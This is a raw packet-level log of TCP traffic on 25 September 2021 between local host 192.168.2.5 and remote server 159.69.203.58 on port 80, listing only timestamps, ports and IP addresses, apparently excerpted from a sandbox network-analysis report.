Sep 25, 2021 10:15:03.928566933 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.928591967 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.928638935 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.928642988 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.928647041 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.928682089 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.928719044 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.928730011 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.928735971 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.928759098 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.928798914 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.928809881 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.928812981 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.930226088 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.944374084 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.944494963 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.944577932 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.944638968 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.944644928 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.944686890 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.944732904 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.944736958 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.944742918 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.944785118 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.944832087 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.944840908 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.944845915 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.944895983 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.944943905 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.944945097 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.944956064 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.944994926 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.945035934 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.945041895 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.945041895 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.945087910 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.945128918 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.945137978 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.947277069 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.947987080 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.951411009 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.951461077 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.951498985 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.951500893 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.951510906 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.951530933 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.951553106 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.951579094 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.951581955 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.951582909 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.951605082 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.951628923 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.951630116 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.951637030 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.951642036 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.951651096 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.951672077 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.951673985 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.951694012 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.951715946 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.951716900 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.951720953 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.951739073 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.951762915 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.951771975 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.951777935 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.951783895 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.951786995 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.951802969 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.951812983 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.951837063 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.951859951 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.951860905 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.951869011 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.951880932 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.951904058 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.951905012 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.951908112 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.951925993 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.951929092 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.951946974 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.951967955 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.951971054 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.951977015 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.951988935 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952013016 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952017069 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.952022076 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.952035904 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952058077 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952059031 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.952064037 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.952079058 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952097893 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.952100992 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.952102900 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952120066 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952142000 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952162981 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952184916 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952186108 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.952191114 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.952207088 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952227116 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952249050 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.952256918 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.952322960 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952344894 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952363014 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.952366114 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952368021 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.952385902 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952405930 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.952409983 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952414036 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.952433109 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952454090 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.952454090 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952457905 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.952476025 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952493906 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952516079 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.952517986 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952518940 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.952542067 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952564001 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952584028 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.952584982 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952589989 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.952606916 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952626944 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952642918 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.952649117 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.952649117 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952671051 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952680111 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.952687979 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952709913 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952730894 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952749968 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.952752113 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952758074 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.952773094 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952795982 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952800989 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.952805042 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.952820063 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952837944 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.952845097 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952846050 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.952867031 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952869892 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.952889919 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952898979 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.952909946 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952931881 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952935934 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.952941895 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.952976942 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.952984095 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.952987909 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953001022 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953022003 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953025103 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953042984 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953064919 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953068018 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953073978 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953085899 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953094006 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953107119 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953129053 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953138113 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953145027 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953154087 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953176975 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953186035 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953190088 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953198910 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953222036 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953232050 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953236103 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953246117 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953263044 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953275919 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953282118 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953284979 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953320026 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953325987 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953397989 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953419924 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953440905 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953442097 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953447104 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953461885 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953483105 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953491926 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953500032 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953505993 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953526974 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953531981 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953537941 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953547001 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953566074 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953577042 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953583002 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953586102 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953607082 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953624964 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953627110 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953629017 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953649044 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953674078 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953685045 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953687906 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953696012 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953717947 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953742027 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953749895 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953758001 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953763962 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953783989 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953792095 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953795910 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953805923 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953828096 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953845024 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953851938 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953852892 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953875065 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953896999 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953907967 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953912973 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953917980 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953938961 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953958988 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.953960896 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953964949 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.953980923 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.954000950 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.954025030 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.954026937 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.954032898 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.954046965 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.954067945 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.954087973 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.954090118 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.954094887 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.954108953 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.954129934 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.954152107 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.954160929 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.954164982 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.954607010 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.955843925 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.967775106 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.967858076 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.967963934 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.967988014 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.968008995 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.968030930 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.968038082 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.968041897 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.968050957 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.968072891 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.968084097 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.968091011 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.968094110 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.968118906 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.968121052 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.968126059 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.968141079 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.968161106 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.968162060 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.968166113 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.968190908 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.968285084 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.974127054 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.974155903 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.974174976 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.974201918 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.974220991 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.975064039 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.975099087 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.975150108 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.975161076 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.975265980 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.975289106 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.975308895 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.975347042 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.988683939 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.988759041 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.988801003 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.988805056 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.988821983 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.988840103 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.988883972 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.988887072 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.988903999 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.988940954 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.989006996 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.989065886 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.989069939 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.989094019 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.989137888 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.989192963 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.989195108 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.989197016 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.989248991 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.989291906 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.989295959 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.989296913 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.989345074 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.989382982 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.989397049 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.989399910 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.989420891 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.989460945 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.989466906 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.989483118 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.989542007 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.989579916 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.989582062 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.989583969 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.989639044 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.989713907 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.989717007 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.989744902 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.989840031 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.989887953 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.989892960 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.989896059 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.989969969 CEST	80	49744	159.69.203.58	192.168.2.5
